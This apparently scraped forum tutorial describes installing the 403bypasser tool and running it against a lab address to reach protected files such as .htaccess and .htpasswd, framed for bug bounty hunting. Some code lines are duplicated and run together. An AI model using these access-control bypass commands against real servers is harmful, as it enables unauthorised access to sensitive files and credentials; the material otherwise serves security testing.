Chapo1983
Patch Analyst
LEVEL 1
300 XP
Hey Folks, we have an amazing tool for all of you that can reward you if you are a bug bounty hunter and looking for a bug in any web application. 403bypasser automates the techniques used to circumvent access control restrictions on target page. Throughout this tutorial, we’ll show you the installation and some uses of this tool.
Lets talk about it
!!Installation
We first clone the tool from github, enter the directory and execute the “pip” command to install the necessary dependencies.
git clone https://github.com/yunemse48/403bypasser.git
cd 403bypasser/
pip install -r requirements.txt123git clone
https://github.com/yunemse48/403bypasser.gitcd403bypasser/pip install-rrequirements.txt
Now we can operate this tool with the help of “python” utility.
python3 403bypasser.py -h1python3403bypasser.py-h
Why it’s Important
As we know that sometimes we are not able to find the sensitive files of the web server, then it works in that case to find the given sensitive files by using various metacharacters.
python3 403bypasser.py -u http://192.168.1.9 -d htaccess1python3403bypasser.py-u
http://192.168.1.9 -d htaccess
Great
!! As you can see it has successfully found the sensitive file by adding the extension ahead.
Hmm
!! This misconfiguration can easily reward you as there is some juicy stuff in it.
Alright
!! You can try to access the location of the sensitive file by following the same procedure as in the previous step.python3 403bypasser.py -u http://192.168.1.9 -d htpasswd1python3403bypasser.py-u
http://192.168.1.9 -d htpasswd
